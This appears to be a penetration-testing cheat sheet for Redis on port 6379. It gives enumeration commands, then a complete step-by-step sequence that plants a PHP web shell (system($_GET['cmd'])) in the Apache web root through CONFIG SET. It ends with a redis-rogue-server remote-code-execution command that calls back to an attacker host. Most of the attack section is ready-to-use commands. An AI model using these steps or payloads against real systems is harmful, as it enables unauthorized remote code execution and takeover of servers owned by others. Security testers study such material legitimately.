Redis

Redis is an In-Memory Data Structure store used as a Database, cache, message ber, and Streaming Engine.

:: Redis
6379/TCP

Redis Security

Redis does not try to implement Access Control, it provides a tiny layer of optional Authentication that is turned ON by Editing the redis.conf file. The password is set by the System Administrator in Clear-Text inside the redis.conf file.

:: Authenticating in Redis
AUTH <username> <password>

Enumeration

:: Show Database Information
INFO

:: Show Database Configuration
CONFIG GET *

:: Show Connected Clients
client list

PHP Web-Shell

Only Possible If We Know the Path of the Website Folder

:: Apache PATH
config set dir /var/www/html

:: Filename
config set dbfilename web_shell.php

:: PAYLOAD
set test "<?php system($_GET['cmd']);?>"
save

Redis Rogue Server

Redis RCE

Works only on Version: <=5.0.5

Redis Rogue Server

redis-rogue-server --rhost <TARGET_IP> --lhost <ATTACKER_IP>

Redis Security​

Enumeration​

PHP Web-Shell​

Redis Rogue Server​

Redis Security

Enumeration

PHP Web-Shell

Redis Rogue Server